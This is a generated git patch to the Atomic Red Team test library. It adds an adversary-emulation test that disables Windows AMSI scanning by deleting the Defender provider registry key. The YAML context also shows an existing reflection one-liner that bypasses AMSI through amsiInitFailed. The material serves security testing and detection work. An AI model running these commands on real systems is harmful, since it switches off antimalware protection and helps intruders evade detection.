From 7f35271b8e7280f8cd26251adc830a0d64c5d7c9 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 17 Sep 2019 19:17:51 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1089/T1089.md | 23 +++++++++++++++++++++++ atomics/index.md | 1 + atomics/index.yaml | 15 +++++++++++++++ atomics/windows-index.md | 1 + 4 files changed, 40 insertions(+) diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md index 08c63e8f..1349e8a1 100644 --- a/atomics/T1089/T1089.md +++ b/atomics/T1089/T1089.md @@ -26,6 +26,8 @@ - [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed) +- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key) +
@@ -260,3 +262,24 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ ```
+
+ +## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key +With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. +This test removes the Windows Defender provider registry key. + +**Supported Platforms:** Windows + + +#### Run it with `powershell`! Elevation Required (e.g. root or admin) +``` +Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse +``` + + +#### Cleanup Commands: +``` +New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" +``` + +
diff --git a/atomics/index.md b/atomics/index.md index cda438b7..6360f737 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -194,6 +194,7 @@ - Atomic Test #9: Disable Windows IIS HTTP Logging [windows] - Atomic Test #10: Uninstall Sysmon [windows] - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows] + - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/index.yaml b/atomics/index.yaml index 154d1117..5188e4a1 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -6010,6 +6010,21 @@ defense-evasion: elevation_required: false command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n" cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n" + - name: AMSI Bypass - Remove AMSI Provider Reg Key + description: "With administrative rights, an adversary can remove the AMSI Provider + registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis + test removes the Windows Defender provider registry key. \n" + supported_platforms: + - windows + executor: + name: powershell + elevation_required: true + command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" + -Recurse + +' + cleanup_command: New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" + -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" T1107: technique: external_references: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index f634da4b..ab263544 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -38,6 +38,7 @@ - Atomic Test #9: Disable Windows IIS HTTP Logging [windows] - Atomic Test #10: Uninstall Sysmon [windows] - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows] + - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)